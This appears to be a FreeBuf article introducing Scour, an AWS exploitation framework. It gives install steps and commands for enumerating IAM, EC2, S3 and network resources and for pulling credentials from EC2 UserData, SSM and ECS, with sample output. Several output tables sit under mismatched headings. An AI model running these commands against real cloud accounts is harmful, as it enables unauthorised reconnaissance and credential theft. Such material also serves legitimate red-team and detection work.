freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Scour:一款针对AWS的漏洞利用框架
2021-08-21 14:17:34

关于Scour

Scour是一款针对AWS的漏洞利用框架,该工具基于Golang开发,专为红队测试和蓝队分析而设计。Scour引入了大量的现代化技术,可以用于攻击环境或建立防御检测的现代技术。

功能介绍

命令补全

动态资源列表

命令历史

蓝队模式(使用唯一用户代理标记攻击)

工具安装

Scour基于Golang开发,安装何使用都非常的简单和方便。

源码获取:

go get github.com/grines/scour

代码构建:

go build main.go

Scour基础命令

枚举存储在~/aws/credentials中的所有可用AWS资料:

token profile <profile_name> <region>

查看同一个或跨帐户角色(需要活动会话):

token AssumeRole <role_name> <region>

查看指定模块的帮助信息:

help module

使用默认参数运行指定模块:

attack evasion <tactic>

使用命令行运行Scour

进入Scour的命令行模式:

scour

设置执行命令的会话:

Not Connected <> token profile apiuser us-east-1

与一个AWS账号进行连接:

Connected <apiuser/us-east-1>

数据枚举

IAM发现

Connected <apiuser/us-east-1> attack enum IAM
+-------------+---------------------+------------------+---------------+--------------+  |    USER     |  MANAGED POLICIES   | INLINE POLICIES  |    GROUPS     | ISPRIVILEGED |  +-------------+---------------------+------------------+---------------+--------------+  | admin       | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true         |  | EC2         | AmazonEC2FullAccess |                  |               | true         |  +-------------+---------------------+------------------+---------------+--------------+  

角色发现

Connected <apiuser/us-east-1> attack enum Roles
+-------------+---------------------+------------------+---------------+--------------+

|    USER     |  MANAGED POLICIES   | INLINE POLICIES  |    GROUPS     | ISPRIVILEGED |

+-------------+---------------------+------------------+---------------+--------------+

| admin       | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true         |

| EC2         | AmazonEC2FullAccess |                  |               | true         |

+-------------+---------------------+------------------+---------------+--------------+

EC2发现

Connected <apiuser/us-east-1> attack enum EC2
UA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum

+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+

|                            ROLE                            | PRINCIPAL TYPE |                  IDENTITY/SERVICE                   | ISPRIVILEGED |

+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+

| Amazon_CodeBuild_dW6zqYHT3m                                | AWS            | [arn:aws:iam::861293084598:root                     | true         |

|                                                            |                | codebuild.amazonaws.com]                            |              |

| Amazon_CodeBuild_f2DOFPjMHK                                | Service        | [codebuild.amazonaws.com]                           | true         |

| Amazon_   CodeBuild_HS59ko7lxn                                | Service        | [codebuild.amazonaws.com]                           | true         |

+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+

S3发现

Connected <apiuser/us-east-1> attack enum S3
UA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum

+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+

|     INSTANCEID      |                  INSTANCE PROFILE                   |     VPC      | PUBLICIP |   PRIVATEIP   |   SECURITY GROUPS    | PORTS  |  STATE  | ISPRIVILEGED | ISPUBLIC |

+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+

| i-0f5604708c0b51429 | None                                                | vpc-7e830c1a | None     | 172.31.53.199 | sg-09fcd28717cf4f512 | 80*    | stopped | false        | true     |

|                     |                                                     |              |          |               |                      | 22*    |            |              |          |

|                     |                                                     |              |          |               |                      | 5000*  |         |              |          |

| i-03657fe3b9decdf51 | arn:aws:iam::861293084598:instance-profile/OrgAdmin | vpc-7e830c1a | None     | 172.31.45.96  | sg-61b1fd07          | All*   | stopped | true         | true     |

|                     |                                                     |              |          |               |                      | 8888*  |         |              |          |

| i-01b265a5fdc45df57 | None                                                | vpc-7e830c1a | None     | 172.31.38.118 | sg-0392f752f9b849d3f | 3389*  | stopped | false        | true     |

| i-0867709d6c0be74d9 | arn:aws:iam::861293084598:instance-profile/OrgAdmin | vpc-7e830c1a | None     | 172.31.39.199 | sg-006543a34d2f70028 | 22*    | stopped | true         | true     |

| i-0   d95790b5e7ddff23 | None                                                | vpc-7e830c1a | None     | 172.31.12.57  | sg-e1a50dac          | 33391* | stopped | false        | true     |

+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+

组发现

Connected <apiuser/us-east-1> attack enum Groups
UA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum

+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+

|                  BUCKET                   | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION |  REGION   |

+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+

| amazon-conn********3d79b01a               | false     | false     | false        |             | false               |             | false       | us-west-2 |

| aws-cloudtrail-logs-**********98-cb39df0d | true      | false     | false        |             | false               |             | false       |           |

| bullsecu*********                         | true      | true      | false        |             | false                  |             | false       |           |

| connect-6ec*****ad67                      | false     | false     | false        |             | false               |             | false       |           |

| connect-******5337c3                      | false     | false     | false        |             | false               |             | false       |           |

| ransom********                            | true      | false     | false        |             | false               |             | false       |           |

| red********                               | false     | false     | false        |             | false               |             | false       |           |

| rep-*****                                 | false     | false     | false        |             | false               |             | false       | us-west-2 |

| terraform*******                          | false     | false     | false        |             | false                  |             | false       |           |

+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+

网络发现

Connected <apiuser/us-east-1> attack enum Network
UA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum

+-----------------------------------------------+---------------------+--------------+-----------------+--------------+

|                     GROUP                     |      POLICIES       | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |

+-----------------------------------------------+---------------------+--------------+-----------------+--------------+

| EC2                                           | SecurityAudit       | false        |                 | false        |

| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 |                     | false        |                 | false        |

| TestGroup                                     | AmazonEC2FullAccess | true         |                 | false        |

|                                               | SecurityAudit       |              |                 |              |

+-----------------------------------------------+--------   -------------+--------------+-----------------+--------------+

凭证发现

从EC2用户数据中提取凭证信息:

Connected <apiuser/us-east-1> attack creds UserData
[Sun May  9 06:10:16 2021]  INF  Stopping Instance i-0f5604708c0b51429 - State: stopped

[Sun May  9 06:10:46 2021]  INF  Modifying Instance Attribute UserData on i-0f5604708c0b51429

[Sun May  9 06:10:47 2021]  INF  Starting Instance i-0f5604708c0b51429 - State: pending

从系统管理器中提取凭证信息:

Connected <apiuser/us-east-1> attack creds SSM
UA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds

+---------------------+------------------+-------------------------------------------------------------------------------+

|     INSTANCEID      |       RULE       |                                    FINDING                                    |

+---------------------+------------------+-------------------------------------------------------------------------------+

| i-0f5604708c0b51429 | Slack Webhook    | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |

| i-0f5604708c0b51429 | Generic Password | password=thisisapassword                                                      |

+---------------------+------------------+-------------------------------------------------------------------------------+

从ECS中获取凭证信息:

Connected <apiuser/us-east-1> attack creds ECS
UA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds

+------------+----------+----------------------+

| PARAM NAME | DATATYPE |        VALUE         |

+------------+----------+----------------------+

| Test       | text     | thismightbeapassword |

+------------+----------+----------------------+

工具运行演示

项目地址

Scour:【GitHub传送门

本文作者:, 转载请注明来自FreeBuf.COM

# AWS攻防 # AWS安全
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑